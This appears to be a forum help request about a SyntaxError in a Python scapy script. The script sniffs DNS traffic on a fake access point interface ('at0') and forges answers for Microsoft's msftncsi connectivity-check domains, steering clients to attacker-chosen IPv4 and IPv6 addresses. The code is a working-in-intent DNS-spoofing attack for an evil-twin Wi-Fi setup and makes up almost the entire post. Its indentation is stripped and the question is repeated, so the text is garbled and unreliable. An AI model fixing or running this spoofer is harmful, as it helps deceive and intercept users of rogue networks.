Thank you dear friends
I corrected the indented cases
But I still get the error
line 43
else :
^
SyntaxError: invalid syntax
I would really appreciate if you could help me modify this code
I corrected the indented cases
But I still get the error
line 43
else :
^
SyntaxError: invalid syntax
I would really appreciate if you could help me modify this code
from scapy.all import *
DIR = os.path.dirname(os.path.abspath(__file__))
print('Executed from ' + DIR + '\n')
print('Assuming interface at0')
def FakeAccess2(pkt):
pkt = pkt[0]
if pkt.haslayer(DNSQR):
print('Packet with DNSQR layer found.')
if pkt[DNS].qd.qtype == 1:
print('DNSQR type appears type = A')
if 'dns' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
#MUST RETURN TRUE VALUE!
print('It appears captured DNS request requests dns.msftncsi.com')
spoofed_pkt = Ether(dst = pkt[Ether].src, src = pkt[Ether].dst, type = pkt[Ether].type) / \
IP(dst = pkt[IP].src, src = pkt[IP].dst) / \
UDP(dport = pkt[UDP].sport, sport = pkt[UDP].dport) / \
DNS(id = pkt[DNS].id, qr = 1, aa = 1, qd = pkt[DNS].qd, \
an = DNSRR(rrname = pkt[DNS].qd.qname, ttl = 64, rdata = '131.107.255.255'))
del pkt[IP].chksum
del pkt[UDP].chksum
# replace your Fake AP interface with 'at0'
sendp(spoofed_pkt, iface = 'at0')
print('Spoofed response send:')
spoofed_pkt.show2()
if 'www' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
#MUST POINT TO SERVER WITH ncsi.txt;ISTO NARED ZA IPV6
print('It appears captured DNS request requests www.msftncsi.com')
spoofed_pkt = Ether(dst = pkt[Ether].src, src = pkt[Ether].dst, type = pkt[Ether].type) / \
IP(dst = pkt[IP].src, src = pkt[IP].dst) / \
UDP(dport = pkt[UDP].sport, sport = pkt[UDP].dport) / \
DNS(id = pkt[DNS].id, qr = 1, aa = 1, qd = pkt[DNS].qd, \
# 10.0 .0 .254 mora bit GW nastiman za dhcp
an = DNSRR(rrname = pkt[DNS].qd.qname, ttl = 64, rdata = '10.0.0.254'))
del pkt[IP].chksum
del pkt[UDP].chksum
sendp(spoofed_pkt, iface = 'at0')
print('Spoofed response send:')
spoofed_pkt.show2()
else :
print('Wrong DNS.qd.qname :' + pkt[DNS].qd.qname)
if pkt[DNS].qd.qtype == 28:
print('DNSQR type appears type = AAAA')
if 'dns' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
#MUST RETURN TRUE VALUE
print('AAAA DNS request for dns.msftncsi.com found, loop works')
spoofed_pkt = Ether(dst = pkt[Ether].src, src = pkt[Ether].dst, type = pkt[Ether].type) / \
IP(dst = pkt[IP].src, src = pkt[IP].dst) / \
UDP(dport = pkt[UDP].sport, sport = pkt[UDP].dport) / \
DNS(id = pkt[DNS].id, qr = 1, aa = 1, qd = pkt[DNS].qd, \
an = DNSRR(rrname = pkt[DNS].qd.qname, type = 28, ttl = 64, rdata = 'fd3e:4f5a:5b81::1'))
del pkt[IP].chksum
del pkt[UDP].chksum
sendp(spoofed_pkt, iface = 'at0')
print('Spoofed response send:')
spoofed_pkt.show2()
if 'dns' not in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
#MUST RETURN TRUE VALUE
print('AAAA DNS request for www.msftncsi.com found, loop works')
spoofed_pkt = Ether(dst = pkt[Ether].src, src = pkt[Ether].dst, type = pkt[Ether].type) / \
IP(dst = pkt[IP].src, src = pkt[IP].dst) / \
UDP(dport = pkt[UDP].sport, sport = pkt[UDP].dport) / \
DNS(id = pkt[DNS].id, qr = 1, aa = 1, qd = pkt[DNS].qd, \
an = DNSRR(rrname = pkt[DNS].qd.qname, type = 28, ttl = 64, rdata = 'fe80::ea94:f6ff:fe24:d147'))
#RDATA JE IPV6 OD at0
del pkt[IP].chksum
del pkt[UDP].chksum
sendp(spoofed_pkt, iface = 'at0')
print('Spoofed response send:')
spoofed_pkt.show2()
else :
print('Captured packet has no DNSQR')
print('Sniffing...')
sniff(filter = 'dst port 53', prn = FakeAccess2, store = 0, count = 0, iface = 'at0')